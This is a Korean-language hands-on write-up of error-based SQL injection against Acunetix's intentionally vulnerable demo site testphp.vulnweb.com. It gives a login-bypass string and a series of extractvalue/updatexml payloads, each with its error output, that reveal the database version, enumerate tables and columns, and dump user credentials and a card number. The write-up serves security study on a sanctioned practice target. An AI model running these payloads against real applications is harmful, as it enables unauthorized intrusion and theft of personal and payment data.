[Acunetix Acuart] SQL Injection 실습 (Error-Based-SQL Injection)

http://testphp.vulnweb.com/index.php

Home of Acunetix Art

---

1. login

예상 쿼리 : select * from table where Usename=' ' and password=' '

공격 쿼리 : password='' or 1=1[공백]--[공백]'

---

test로 로그인된다. 

Name, Credit card Number, E-Mail, Phone number, Address에 XSS 코드가 있는데 왜 한건지 모르겠다.

새로고침하면 정보들이 계속 바뀐다.

---

2. update 공격

 

예상쿼리 : update acuart set 컬럼1 = '[]', 컬럼2 = '[]', ... where 컬럼 = 'test'

 

공격 쿼리

' or extractvalue(0x0a,concat(0x0a, version(), 0x0a)) or '

' or extractvalue(0x0a,concat(0x0a, system_user(), 0x0a)) or '

' or extractvalue(0x0a,concat(0x0a, database(), 0x0a)) or '

 

' or updatexml(1,concat(0x7e, version()),0) or '
' or updatexml(1,concat(0x7e, system_user()),0) or '
' or updatexml(1,concat(0x7e, database()),0) or '

 

extractvalue, updatexml 둘다 가능하다.

---

update acuart set 컬럼1 = '' or extractvalue(0x0a,concat(0x0a, version(), 0x0a)) or '', 컬럼2 = '[]', ... where 컬럼 = 'test'

 

' or extractvalue(0x0a,concat(0x0a,  version() , 0x0a)) or ' 결과

---

INPUT	OUTPUT
' or extractvalue(0x0a,concat(0x0a, version(), 0x0a)) or '	Unable to update user information: XPATH syntax error: ' 8.0.22-0ubuntu0.20.04.2 '
' or extractvalue(0x0a,concat(0x0a, system_user(), 0x0a)) or '	Unable to update user information: XPATH syntax error: ' acuart@localhost '
' or extractvalue(0x0a,concat(0x0a, database(), 0x0a)) or '	Unable to update user information: XPATH syntax error: ' acuart '

---

3. DB 목록화

공격 쿼리

' or updatexml(1,concat(0x7e,(select group_concat(DISTINCT(table_schema)) from information_schema.tables)),0) or '

 

' or updatexml(1,concat(0x7e, (select group_concat(DISTINCT(table_schema)) from information_schema.tables) ),0) or ' 결과

 

DATABASE

acuart

information_schema

 

---

4. Table 목록화

공격쿼리

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='acuart')),0) or '

 

' or updatexml(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='acuart') ),0) or ' 결과

결과 값을 보면 테이블  전체가 출력되지 않은것을 확인할 수 있다.

 

INPUT	OUTPUT
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='acuart' limit 4,1)),0) or '	Unable to update user information: XPATH syntax error: '~guestbook'
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='acuart' limit 5,1)),0) or '	Unable to update user information: XPATH syntax error: '~pictures'
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='acuart' limit 6,1)),0) or '	Unable to update user information: XPATH syntax error: '~product'
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='acuart' limit 7,1)),0) or '	Unable to update user information: XPATH syntax error: '~users

 

Table

artists

carts

categ

featured

guestbook

pictures

prod

users

회원정보니까 users가 아닐까? 합리적인 의심!

---

5. column 목록화

공격 쿼리

' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='acuart' and table_name='users')),0) or '

 

테이블 목록화 할때와 마찬가지로 글씨 잘린다.

 

INPUT	OUTPUT
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='acuart' and table_name='users' limit 6,1)),0) or '	Unable to update user information: XPATH syntax error: '~phone'
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='acuart' and table_name='users' limit 7,1)),0) or '	Unable to update user information: XPATH syntax error: '~uname'

column

address

cart

cc

email

name

pass

phone

uname

 

---

6. Data 목록화

공격쿼리

' or updatexml(1,concat(0x7e,(select uname from acuart.users)),0) or '

그 동안 저런식으로 했는데 오류떠서 확인해보니까 서브 쿼리로 묶어줘야 한다라...

 

 

공격쿼리

' or updatexml(1,concat(0x7e,(select uname from (select uname from acuart.users)a limit 0,1)),0) or '

---

' or updatexml(1,concat(0x7e,(select group_concat(uname, '###', cc, '###', address, '###', email, '###', name, '###', pass, '###', phone, '###') from (select uname, cc, address, email, name, pass, phone from acuart.users)a limit 0,1)),0) or '

공격쿼리

' or updatexml(1,concat(0x7e,(select group_concat(uname, '###', cc, '###', address, '###', email, '###', name, '###', pass, '###', phone, '###') from (select uname, cc, address, email, name, pass, phone from acuart.users)a limit 0,1)),0) or '

 

눈치챘겠지만 table, column 목록화 하면서 출력되는 글자양이 정해져 있어서 저렇게 해도 소용없다.

INPUT	OUTPUT
' or updatexml(1,concat(0x7e,(select group_concat(uname) from (select uname from acuart.users)a)),0) or '	Unable to update user information: XPATH syntax error: '~test'
' or updatexml(1,concat(0x7e,(select group_concat(cc) from (select cc from acuart.users)a)),0) or '	Unable to update user information: XPATH syntax error: '~1234-5678-2300-9000'
' or updatexml(1,concat(0x7e,(select group_concat(address) from (select address from acuart.users)a)),0) or '	Unable to update user information: XPATH syntax error: '~21 street'
' or updatexml(1,concat(0x7e,(select group_concat(email) from (select email from acuart.users)a)),0) or '	Unable to update user information: XPATH syntax error: '~email@email.com'
' or updatexml(1,concat(0x7e,(select group_concat(name) from (select name from acuart.users)a)),0) or '	Unable to update user information: XPATH syntax error: '~Anonymous'
' or updatexml(1,concat(0x7e,(select group_concat(pass) from (select pass from acuart.users)a)),0) or '	Unable to update user information: XPATH syntax error: '~test'
' or updatexml(1,concat(0x7e,(select group_concat(phone) from (select phone from acuart.users)a)),0) or '	Unable to update user information: XPATH syntax error: '~2323345'

group_concat() 사용해서 했는데 출력되는 데이터가 1열 밖에 없다.

uname	cc	address	email	name	pass	phone
test	1234-5678-2300-9000	21 street	email@email.com	Anonymous	test	2323345
null	null	null	null	null	null	null
...	...	...	...	...	...	...

새로고침하면 프로필 정보가 계속 바뀌는데 DB에서 랜덤으로 바뀌게 해놓은것 같다.